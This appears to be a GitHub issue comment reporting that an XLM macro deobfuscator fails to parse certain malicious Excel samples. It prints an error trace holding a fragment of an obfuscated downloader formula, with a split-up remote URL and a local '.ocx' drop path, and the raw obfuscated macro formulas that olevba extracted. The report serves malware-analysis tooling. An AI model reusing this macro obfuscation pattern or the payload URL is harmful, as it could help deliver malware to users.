Open cccs-jh opened 2 years ago
https://www.virustotal.com/gui/file/756186368250a9902ae168c2f0c6a77d3fdd70f7a5589c36f8c7bd80cf8756e4 is another sample with this problem. I've looked a bit into this issue and it looks like there are 2 problems with analyzing the sample:
Running xlmdeobfuscator on this file: https://www.virustotal.com/gui/file/a0de1f3af78bef68ddfcabf4b7cedfa0e466ac65648a5e81e591702b463c96b1 gives the following error:
Unencrypted xls file
[Loading Cells] auto_open: auto_open->'KBRSBTL'!$J$1 [Starting Deobfuscation] CELL:J12 , FullEvaluation , "False" Error [deobfuscator.py:2586 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")&"al")&"ak")&"sh")&"mi.c")&"o")&"m/d")&"a",25352.0)=TEXT(((((("t"&"a_w")&"in")&"ni")&"ng/k")&"Yv6")&"xb/",3646.0)","..\peg1.ocx",0,0)') at line 1, column 69. Expected one of:
The raw XLM macro, as extracted by olevba, is:
' RAW EXCEL4/XLM MACRO FORMULAS: ' SHEET: KBRSBTL, Macrosheet ' CELL:J12, =(((((((FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!G24)&'THJD'!D15)&'SGGSBe'!D8)&'THJD'!R19,J15)=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!D8)&'KBSNTND'!F24)&'KBSNTND'!L31,J17))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!H26)&'THJD'!D15)&'SGGSBe'!H13)&'THJD'!R19,J19))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!H13)&'KBSNTND'!F24)&'KBSNTND'!L31,J21))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!I24)&'THJD'!D15)&'SGGSBe'!M3)&'THJD'!R19,J23))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!M3)&'KBSNTND'!F24)&'KBSNTND'!L31,J25))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!J26)&'THJD'!D15)&'SGGSBe'!R17)&'THJD'!R19,J27))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!R17)&'KBSNTND'!F24)&'KBSNTND'!L31,J29))=FORMULA((('KBSNTND'!L24&'KBSNTND'!G44)&'KBSNTND'!H46)&'KBSNTND'!J44,J49), 1